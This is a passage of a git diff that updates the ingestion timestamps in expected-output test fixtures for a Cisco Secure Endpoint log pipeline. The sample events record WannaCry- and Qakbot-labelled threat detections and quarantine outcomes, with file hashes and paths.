@@ -7704,7 +7704,7 @@ }, "event": { "severity": 2, - "ingested": "2021-12-09T13:35:39.764532300Z", + "ingested": "2021-12-14T14:40:45.520895681Z", "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6419275394960065000,\"timestamp\":1610645990,\"timestamp_nanoseconds\":798000000,\"date\":\"2021-01-14T17:39:50+00:00\",\"event_type\":\"Threat Detected\",\"event_type_id\":1090519054,\"detection\":\"W32.Variant:Gen.20gl.1201\",\"detection_id\":\"6419275394960064601\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_WannaCry_Ransomware\",\"external_ip\":\"81.2.69.144\",\"user\":\"user@testdomain.com\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"53:74:31:cb:37:50\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"file_name\":\"tasksche.exe\",\"file_path\":\"\\\\\\\\?\\\\C:\\\\ProgramData\\\\qzkbplcgew884\\\\tasksche.exe\",\"identity\":{\"sha256\":\"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa\",\"sha1\":\"5ff465afaabcbf0150d1a3ab2c2e74f3a4426467\",\"md5\":\"84c82835a5d21bbcf75a61706d8ab549\"}}}}", "code": "1090519054", "kind": "alert", 
@@ -7794,7 +7794,7 @@ }, "event": { "severity": 2, - "ingested": "2021-12-09T13:35:39.764538200Z", + "ingested": "2021-12-14T14:40:45.520896068Z", "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6419275394960065000,\"timestamp\":1610645990,\"timestamp_nanoseconds\":767000000,\"date\":\"2021-01-14T17:39:50+00:00\",\"event_type\":\"Threat Detected\",\"event_type_id\":1090519054,\"detection\":\"W32.Variant:Gen.20gl.1201\",\"detection_id\":\"6419275394960064598\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_WannaCry_Ransomware\",\"external_ip\":\"81.2.69.144\",\"user\":\"user@testdomain.com\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"53:74:31:cb:37:50\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"file_name\":\"tasksche.exe\",\"file_path\":\"\\\\\\\\?\\\\C:\\\\ProgramData\\\\qzkbplcgew884\\\\tasksche.exe\",\"identity\":{\"sha256\":\"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa\",\"sha1\":\"5ff465afaabcbf0150d1a3ab2c2e74f3a4426467\",\"md5\":\"84c82835a5d21bbcf75a61706d8ab549\"}}}}", "code": "1090519054", "kind": "alert", 
@@ -7884,7 +7884,7 @@ }, "event": { "severity": 2, - "ingested": "2021-12-09T13:35:39.764542500Z", + "ingested": "2021-12-14T14:40:45.520896461Z", "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6419275394960065000,\"timestamp\":1610645990,\"timestamp_nanoseconds\":751000000,\"date\":\"2021-01-14T17:39:50+00:00\",\"event_type\":\"Threat Detected\",\"event_type_id\":1090519054,\"detection\":\"W32.Variant:Gen.20gl.1201\",\"detection_id\":\"6419275394960064600\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_WannaCry_Ransomware\",\"external_ip\":\"81.2.69.144\",\"user\":\"user@testdomain.com\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"53:74:31:cb:37:50\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"file_name\":\"tasksche.exe\",\"file_path\":\"\\\\\\\\?\\\\C:\\\\ProgramData\\\\qzkbplcgew884\\\\tasksche.exe\",\"identity\":{\"sha256\":\"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa\",\"sha1\":\"5ff465afaabcbf0150d1a3ab2c2e74f3a4426467\",\"md5\":\"84c82835a5d21bbcf75a61706d8ab549\"}}}}", "code": "1090519054", "kind": "alert", 
@@ -7974,7 +7974,7 @@ }, "event": { "severity": 2, - "ingested": "2021-12-09T13:35:39.764547600Z", + "ingested": "2021-12-14T14:40:45.520896852Z", "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6419275394960065000,\"timestamp\":1610645990,\"timestamp_nanoseconds\":735000000,\"date\":\"2021-01-14T17:39:50+00:00\",\"event_type\":\"Threat Detected\",\"event_type_id\":1090519054,\"detection\":\"W32.Variant:Gen.20gl.1201\",\"detection_id\":\"6419275394960064599\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_WannaCry_Ransomware\",\"external_ip\":\"81.2.69.144\",\"user\":\"user@testdomain.com\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"53:74:31:cb:37:50\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"file_name\":\"tasksche.exe\",\"file_path\":\"\\\\\\\\?\\\\C:\\\\ProgramData\\\\qzkbplcgew884\\\\tasksche.exe\",\"identity\":{\"sha256\":\"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa\",\"sha1\":\"5ff465afaabcbf0150d1a3ab2c2e74f3a4426467\",\"md5\":\"84c82835a5d21bbcf75a61706d8ab549\"}}}}", "code": "1090519054", "kind": "alert", 
@@ -8067,7 +8067,7 @@ }, "event": { "severity": 2, - "ingested": "2021-12-09T13:35:39.764551600Z", + "ingested": "2021-12-14T14:40:45.520897246Z", "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6419275394960065000,\"timestamp\":1610645990,\"timestamp_nanoseconds\":423000000,\"date\":\"2021-01-14T17:39:50+00:00\",\"event_type\":\"Threat Detected\",\"event_type_id\":1090519054,\"detection\":\"W32.Variant:Gen.20gl.1201\",\"detection_id\":\"6419275394960064597\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_WannaCry_Ransomware\",\"external_ip\":\"81.2.69.144\",\"user\":\"user@testdomain.com\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"53:74:31:cb:37:50\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"file_name\":\"tasksche.exe\",\"file_path\":\"\\\\\\\\?\\\\C:\\\\WINDOWS\\\\tasksche.exe\",\"identity\":{\"sha256\":\"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa\"},\"parent\":{\"process_id\":6404,\"disposition\":\"Malicious\",\"file_name\":\"mssecsvc.exe\",\"identity\":{\"sha256\":\"24d004a104d4d54034dbcffc2a4b19a11f39008a575aa614ea04703480b1022c\"}}}}}", "code": "1090519054", "kind": "alert", 
@@ -8157,7 +8157,7 @@ }, "event": { "severity": 2, - "ingested": "2021-12-09T13:35:39.764556100Z", + "ingested": "2021-12-14T14:40:45.520897632Z", "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6419275394960065000,\"timestamp\":1610645990,\"timestamp_nanoseconds\":377000000,\"date\":\"2021-01-14T17:39:50+00:00\",\"event_type\":\"Threat Detected\",\"event_type_id\":1090519054,\"detection\":\"W32.Variant:Gen.20gl.1201\",\"detection_id\":\"6419275394960064596\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_WannaCry_Ransomware\",\"external_ip\":\"81.2.69.144\",\"user\":\"user@testdomain.com\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"53:74:31:cb:37:50\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"file_name\":\"mssecsvc.exe\",\"file_path\":\"\\\\\\\\?\\\\C:\\\\Windows\\\\mssecsvc.exe\",\"identity\":{\"sha256\":\"24d004a104d4d54034dbcffc2a4b19a11f39008a575aa614ea04703480b1022c\"}}}}", "code": "1090519054", "kind": "alert", diff --git a/packages/cisco_secure_endpoint/data_stream/event/_dev/test/pipeline/test-cisco-amp5.log-expected.json b/packages/cisco_secure_endpoint/data_stream/event/_dev/test/pipeline/test-cisco-amp5.log-expected.json index 7fa4df7018a..2ef9d191181 100644 --- a/packages/cisco_secure_endpoint/data_stream/event/_dev/test/pipeline/test-cisco-amp5.log-expected.json 
+++ b/packages/cisco_secure_endpoint/data_stream/event/_dev/test/pipeline/test-cisco-amp5.log-expected.json 
@@ -51,7 +51,7 @@ }, "event": { "severity": 2, - "ingested": "2021-12-09T13:35:47.010643900Z", + "ingested": "2021-12-14T14:40:52.874130602Z", "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6419275394960065000,\"timestamp\":1610645990,\"timestamp_nanoseconds\":96000000,\"date\":\"2021-01-14T17:39:50+00:00\",\"event_type\":\"Threat Detected\",\"event_type_id\":1090519054,\"detection\":\"W32.Variant:Gen.20gl.1201\",\"detection_id\":\"6419275394960064595\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_WannaCry_Ransomware\",\"external_ip\":\"81.2.69.144\",\"user\":\"user@testdomain.com\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"53:74:31:cb:37:50\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"file_name\":\"tasksche.exe\",\"file_path\":\"\\\\\\\\?\\\\C:\\\\Windows\\\\tasksche.exe\",\"identity\":{\"sha256\":\"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa\",\"sha1\":\"5ff465afaabcbf0150d1a3ab2c2e74f3a4426467\",\"md5\":\"84c82835a5d21bbcf75a61706d8ab549\"},\"parent\":{\"process_id\":6404,\"disposition\":\"Malicious\",\"file_name\":\"mssecsvc.exe\",\"identity\":{\"sha256\":\"24d004a104d4d54034dbcffc2a4b19a11f39008a575aa614ea04703480b1022c\"}}}}}", "code": "1090519054", "kind": "alert", 
@@ -129,7 +129,7 @@ }, "event": { "severity": 2, - "ingested": "2021-12-09T13:35:47.010647500Z", + "ingested": "2021-12-14T14:40:52.874133720Z", "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6419275390665097000,\"timestamp\":1610645989,\"timestamp_nanoseconds\":862000000,\"date\":\"2021-01-14T17:39:49+00:00\",\"event_type\":\"Quarantine Failure\",\"event_type_id\":2164260880,\"detection_id\":\"6419275390665097297\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"error\":{\"error_code\":3221225558,\"description\":\"Delete pending\"},\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_WannaCry_Ransomware\",\"external_ip\":\"81.2.69.144\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"53:74:31:cb:37:50\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"identity\":{\"sha256\":\"24d004a104d4d54034dbcffc2a4b19a11f39008a575aa614ea04703480b1022c\"}}}}", "code": "2164260880", "kind": "alert", 
@@ -205,7 +205,7 @@ }, "event": { "severity": 2, - "ingested": "2021-12-09T13:35:47.010651300Z", + "ingested": "2021-12-14T14:40:52.874134281Z", "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6419275390665097000,\"timestamp\":1610645989,\"timestamp_nanoseconds\":659000000,\"date\":\"2021-01-14T17:39:49+00:00\",\"event_type\":\"Quarantine Failure\",\"event_type_id\":2164260880,\"detection_id\":\"6419275390665097295\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"error\":{\"error_code\":3221225761,\"description\":\"Cannot delete\"},\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_WannaCry_Ransomware\",\"external_ip\":\"81.2.69.144\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"53:74:31:cb:37:50\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"identity\":{\"sha256\":\"24d004a104d4d54034dbcffc2a4b19a11f39008a575aa614ea04703480b1022c\"}}}}", "code": "2164260880", "kind": "alert", 
@@ -293,7 +293,7 @@ }, "event": { "severity": 2, - "ingested": "2021-12-09T13:35:47.010654600Z", + "ingested": "2021-12-14T14:40:52.874134722Z", "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6419275390665097000,\"timestamp\":1610645989,\"timestamp_nanoseconds\":831000000,\"date\":\"2021-01-14T17:39:49+00:00\",\"event_type\":\"Threat Detected\",\"event_type_id\":1090519054,\"detection\":\"W32.File.MalParent\",\"detection_id\":\"6419275390665097297\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_WannaCry_Ransomware\",\"external_ip\":\"81.2.69.144\",\"user\":\"user@testdomain.com\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"53:74:31:cb:37:50\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"file_name\":\"mssecsvc.exe\",\"file_path\":\"\\\\\\\\?\\\\C:\\\\Windows\\\\mssecsvc.exe\",\"identity\":{\"sha256\":\"24d004a104d4d54034dbcffc2a4b19a11f39008a575aa614ea04703480b1022c\"}}}}", "code": "1090519054", "kind": "alert", 
@@ -392,7 +392,7 @@ }, "event": { "severity": 2, - "ingested": "2021-12-09T13:35:47.010659500Z", + "ingested": "2021-12-14T14:40:52.874135193Z", "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6419275390665097000,\"timestamp\":1610645989,\"timestamp_nanoseconds\":706000000,\"date\":\"2021-01-14T17:39:49+00:00\",\"event_type\":\"Threat Detected\",\"event_type_id\":1090519054,\"detection\":\"W32.Gen.20gl.1201\",\"detection_id\":\"6419275390665097296\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_WannaCry_Ransomware\",\"external_ip\":\"81.2.69.144\",\"user\":\"user@testdomain.com\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"53:74:31:cb:37:50\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"file_name\":\"mssecsvc.exe\",\"file_path\":\"\\\\\\\\?\\\\C:\\\\WINDOWS\\\\mssecsvc.exe\",\"identity\":{\"sha256\":\"24d004a104d4d54034dbcffc2a4b19a11f39008a575aa614ea04703480b1022c\",\"sha1\":\"e889544aff85ffaf8b0d0da705105dee7c97fe26\",\"md5\":\"db349b97c37d22f5ea1d1841e3c89eb4\"},\"parent\":{\"process_id\":708,\"disposition\":\"Clean\",\"file_name\":\"lsass.exe\",\"identity\":{\"sha256\":\"26f36ca31a1b977685f8df5f8436848b7d4143b47ec0dae68f8382c1b52a6c71\",\"sha1\":\"7abcc82dc5a05b4f53fd0fbd386738e5555025cf\",\"md5\":\"4e568dbe3fff1a0025eb432dc929b78f\"}}}}}", "code": "1090519054", "kind": "alert", 
@@ -495,7 +495,7 @@ }, "event": { "severity": 2, - "ingested": "2021-12-09T13:35:47.010664700Z", + "ingested": "2021-12-14T14:40:52.874135692Z", "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6419275390665097000,\"timestamp\":1610645989,\"timestamp_nanoseconds\":643000000,\"date\":\"2021-01-14T17:39:49+00:00\",\"event_type\":\"Threat Detected\",\"event_type_id\":1090519054,\"detection\":\"W32.Gen.20gl.1201\",\"detection_id\":\"6419275390665097295\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_WannaCry_Ransomware\",\"external_ip\":\"81.2.69.144\",\"user\":\"user@testdomain.com\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"53:74:31:cb:37:50\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"file_name\":\"mssecsvc.exe\",\"file_path\":\"\\\\\\\\?\\\\C:\\\\Windows\\\\mssecsvc.exe\",\"identity\":{\"sha256\":\"24d004a104d4d54034dbcffc2a4b19a11f39008a575aa614ea04703480b1022c\",\"sha1\":\"e889544aff85ffaf8b0d0da705105dee7c97fe26\",\"md5\":\"db349b97c37d22f5ea1d1841e3c89eb4\"},\"parent\":{\"process_id\":708,\"disposition\":\"Clean\",\"file_name\":\"lsass.exe\",\"identity\":{\"sha256\":\"26f36ca31a1b977685f8df5f8436848b7d4143b47ec0dae68f8382c1b52a6c71\",\"sha1\":\"7abcc82dc5a05b4f53fd0fbd386738e5555025cf\",\"md5\":\"4e568dbe3fff1a0025eb432dc929b78f\"}}}}}", "code": "1090519054", "kind": "alert", 
@@ -573,7 +573,7 @@ }, "event": { "severity": 2, - "ingested": "2021-12-09T13:35:47.010669200Z", + "ingested": "2021-12-14T14:40:52.874136152Z", "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6419275390665097000,\"timestamp\":1610645989,\"timestamp_nanoseconds\":721000000,\"date\":\"2021-01-14T17:39:49+00:00\",\"event_type\":\"Threat Quarantined\",\"event_type_id\":553648143,\"detection_id\":\"6419275390665097296\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_WannaCry_Ransomware\",\"external_ip\":\"81.2.69.144\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"53:74:31:cb:37:50\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"identity\":{\"sha256\":\"24d004a104d4d54034dbcffc2a4b19a11f39008a575aa614ea04703480b1022c\"}}}}", "code": "553648143", "kind": "alert", 
@@ -645,7 +645,7 @@ }, "event": { "severity": 2, - "ingested": "2021-12-09T13:35:47.010674600Z", + "ingested": "2021-12-14T14:40:52.874136591Z", "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6411525251028484000,\"timestamp\":1610643578,\"timestamp_nanoseconds\":698000000,\"date\":\"2021-01-14T16:59:38+00:00\",\"event_type\":\"Quarantine Failure\",\"event_type_id\":2164260880,\"detection_id\":\"6411525251028484105\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"error\":{\"error_code\":3221225524,\"description\":\"Object name not found\"},\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_Qakbot_1\",\"external_ip\":\"81.2.69.144\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"f9:65:da:22:2a:41\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"identity\":{\"sha256\":\"bac7bc52812bc63745d4c5904d18e1581e4f0c821b4cf8336c8dd8eab86385ff\"}}}}", "code": "2164260880", "kind": "alert", 
@@ -737,7 +737,7 @@ }, "event": { "severity": 2, - "ingested": "2021-12-09T13:35:47.010679800Z", + "ingested": "2021-12-14T14:40:52.874137086Z", "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6411525251028484000,\"timestamp\":1610643578,\"timestamp_nanoseconds\":214000000,\"date\":\"2021-01-14T16:59:38+00:00\",\"event_type\":\"Threat Detected\",\"event_type_id\":1090519054,\"detection\":\"W32.File.MalParent\",\"detection_id\":\"6411525251028484105\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_Qakbot_1\",\"external_ip\":\"81.2.69.144\",\"user\":\"user@testdomain.com\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"f9:65:da:22:2a:41\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"file_name\":\"MspthrdHash.exe\",\"file_path\":\"\\\\\\\\?\\\\C:\\\\Users\\\\johndoe\\\\AppData\\\\Local\\\\MspthrdHash\\\\MspthrdHash.exe\",\"identity\":{\"sha256\":\"bac7bc52812bc63745d4c5904d18e1581e4f0c821b4cf8336c8dd8eab86385ff\",\"sha1\":\"8cf0ca99a8f5019d8583133b9a9379299c45470c\",\"md5\":\"6894b3834bd541fa85df79e44568acac\"}}}}", "code": "1090519054", "kind": "alert", 
@@ -827,7 +827,7 @@ }, "event": { "severity": 2, - "ingested": "2021-12-09T13:35:47.010685100Z", + "ingested": "2021-12-14T14:40:52.874137702Z", "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6411525251028484000,\"timestamp\":1610643578,\"timestamp_nanoseconds\":183000000,\"date\":\"2021-01-14T16:59:38+00:00\",\"event_type\":\"Threat 